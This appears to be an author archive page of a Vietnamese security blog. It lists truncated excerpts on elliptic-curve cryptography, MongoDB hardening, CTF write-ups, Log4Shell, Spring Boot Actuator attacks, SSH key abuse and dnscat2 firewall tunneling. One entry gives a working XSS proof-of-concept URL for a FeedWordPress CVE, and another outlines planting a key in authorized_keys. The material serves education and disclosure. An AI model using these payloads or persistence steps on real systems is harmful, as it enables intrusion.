Mật mã đường cong elliptic (Elliptic Curve Cryptography) là một kỹ thuật mã hóa khóa công khai dựa trên lý thuyết đường cong elliptic có thể được sử dụng để tạo các khóa mật mã nhanh hơn, nhỏ hơn và hiệu quả hơn. ECC tạo khóa thông qua các thuộc tính của phương trình đườngContinueContinue reading “Hệ mật đường cong Elliptic (Elliptic Curve Cryptography)”
Author Archives: Nhat Truong
Khái niệm đường cong Eliptic
Trong vài thập kỷ gần đây, đường cong elliptic đóng vai trò quan trọng đối với lý thuyết số và mật mã. Mật mã đường cong elliptic (ECC) được giới thiệu lần đầu vào năm 1991 bởi các công trình nghiên cứu độc lập của Neals Koblitz và Victor Miller. Độ an toàn của ECCContinueContinue reading “Khái niệm đường cong Eliptic”
[Write-Up] – Webhacking.kr, Root-me
I. Webhacking.kr Chall old-45 Link: https://webhacking.kr/challenge/web-22/ Ban đầu thì có một form login và bài này cho cả source code View source thì ta được đoạn mã Có thể thấy đầu vào đều được lọc bởi hàm addslashes, hàm nãy sẽ thêm \ vào trước các kí tự như là ‘,” hay \ mục đích là để làm sạch đầuContinueContinue reading “[Write-Up] – Webhacking.kr, Root-me”
Bảo mật cho Mongo DB toàn tập
MongoDB là hệ quản trị cơ sở dữ liệu rất hiệu quả, tuy nhiên còn nhiều cấu hình mặc định và cần kết hợp các yếu tố bảo mật bên ngoài thì mới đảm bảo an ninh, an toàn cho hệ thống cơ sở dữ liệu. Sau đây tôi xin chém gió một loại điểmContinueContinue reading “Bảo mật cho Mongo DB toàn tập”
[CVE-2021-25055] FeedWordPress < 2022.0123- Cross-Site Scripting (Authenticated)
# Referrer: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4POC: http://localhost/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&visibility='”><img+src=2+onerror=alert(origin)>
DANH SÁCH LỖ HỔNG NGHIÊM TRỌNG của TELERIK UI
Telerik là một công ty Bungari cung cấp các công cụ phần mềm (UI) cho web, điện thoại di động, phát triển ứng dụng máy tính để bàn, các công cụ và dịch vụ thuê bao cho cross-platform phát triển ứng dụng. Telerik UI là một thư viện phổ biến chuyên phát triển giao diệnContinueContinue reading “DANH SÁCH LỖ HỔNG NGHIÊM TRỌNG của TELERIK UI”
Spring Boot Actuators attacks
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Spring Boot là một framework mạnh mẽ giúp phát triển ứng dụng web dễ dàng và hiệu quả.ContinueContinue reading “Spring Boot Actuators attacks”
Abusing SSH Access using private keys
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Step 1: Create ssh-keygen file ssh-keygen Step 2: Copy file id_rsa to /ftp_home/.ssh/authorized_keys via FTP or someway 🙂ContinueContinue reading “Abusing SSH Access using private keys”
Using dnscat2 for tunneling bypass Firewall Outbound
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Step 1: Check outbound internet availability Step 2: Install dnscat2 by your way (Use this if you don’tContinueContinue reading “Using dnscat2 for tunneling bypass Firewall Outbound”
Lỗ hổng Log4j CVE-2021-44228
Giới thiệu Gần đây, một lỗ hổng phần mềm rất nghiêm trọng đã được công bố. Nó có mã định danh CVE-2021-44228 (log4shell). Lỗ hổng đã làm cộng đồng nghiên cứu bảo mật nói chung và cộng đồng những nhà phát triển Java nói riêng dậy sóng. Nguyênnhân nằm ở sự phổ biến của thưContinueContinue reading “Lỗ hổng Log4j CVE-2021-44228”
Nhat Truong Blog 